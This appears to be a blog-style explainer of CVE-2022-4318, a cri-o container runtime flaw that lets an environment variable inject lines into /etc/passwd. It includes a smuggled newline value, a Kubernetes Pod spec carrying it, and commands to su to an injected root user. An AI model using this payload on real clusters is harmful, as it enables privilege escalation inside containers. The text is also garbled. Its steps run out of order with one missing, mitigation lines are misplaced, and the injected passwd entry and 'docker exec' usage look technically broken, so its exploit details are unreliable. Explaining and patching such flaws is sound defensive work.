CVE-2022-4318 - Privilege Escalation in cri-o via Arbitrary /etc/passwd Line Injection

In late 2022, a serious vulnerability was discovered in cri-o, an important container runtime that Kubernetes and other systems depend on for running OCI containers. Tracked as CVE-2022-4318, this issue allows attackers to inject arbitrary lines into the /etc/passwd file inside containers. This makes privilege escalation and potential container escape much easier for attackers. Let’s break down how this vulnerability works, why it’s dangerous, and demonstrate an exploit in simple terms.

What Is cri-o?

cri-o is a lightweight container runtime for Kubernetes. It interfaces between the Kubernetes kubelet and actual OCI-compatible runtimes like runc. Because cri-o runs containers, it deals directly with system resources like files and environment variables.

How Was cri-o Vulnerable?

The problem was that when creating containers, cri-o would sometimes write environment variables into critical container files without sanitizing their contents. An attacker with the ability to set environment variables for a container could craft one that injects new lines into /etc/passwd.

### Why /etc/passwd?

This is the file that stores user account information on Linux. By injecting custom lines, an attacker could create a fake user in the container—possibly with root (admin) permissions.

Launch a Container Via cri-o

The attacker uses any tool (like Kubernetes or direct cri-o access) to create a container with the malicious ENVAR.

3. Injected /etc/passwd Entry
Once the container starts, the environment variable is improperly written into /etc/passwd, adding a new user—possibly with root access.

1. Craft the Malicious Environment Variable

ATTACKER_ENVAR="badvalue\nattackeruser:x:::root:/root:/bin/bash"

Here, \n injects a new line and the rest acts as a legitimate root user.

Suppose you control a Pod spec in Kubernetes

apiVersion: v1
kind: Pod
metadata:
  name: exploit-pod
spec:
  containers:
  - name: exploiter
    image: ubuntu:20.04
    env:
    - name: MALICIOUS
      value: "badvalue\nattackeruser:x:::root:/root:/bin/bash"
    command: ["sleep", "99999"]

If cri-o mishandles the environment variable, inside the container, /etc/passwd may have

root:x:::root:/root:/bin/bash
...
attackeruser:x:::root:/root:/bin/bash

The attacker can now switch to attackeruser (with root privileges).

4. Abusing the Privilege

docker exec -it exploit-pod bash
su attackeruser
# You now have a root shell!

Why Is This A Big Deal?

* Privilege escalation: Attackers can become root inside a container—even if you tried to lock down the container.
* Potential container escape: Combined with other bugs, attackers might break out of the container to attack the host.
* Data exfiltration: Gaining root may let an attacker dump secrets or sniff processes inside the container.

Responsible Disclosure and Patching

- The cri-o team was informed responsibly and quickly released patches to sanitize environment variables.

References

- NIST National Vulnerability Database - CVE-2022-4318
- cri-o GitHub Security Advisory
- Container Security 101

Restrict who can set environment variables in workloads.

- Audit container images and running pods to check for suspicious users in /etc/passwd.

Summary

CVE-2022-4318 is a sobering reminder that even small sanitation mistakes in core container platforms like cri-o can have large, real-world consequences. By allowing arbitrary line injection into /etc/passwd, attackers could grab root inside containers and threaten your cluster. Patch promptly, review your cluster security, and stay up-to-date—the security of your containers depends on it.

Timeline

Published on: 09/25/2023 20:15:00 UTC
Last modified on: 09/26/2023 20:51:00 UTC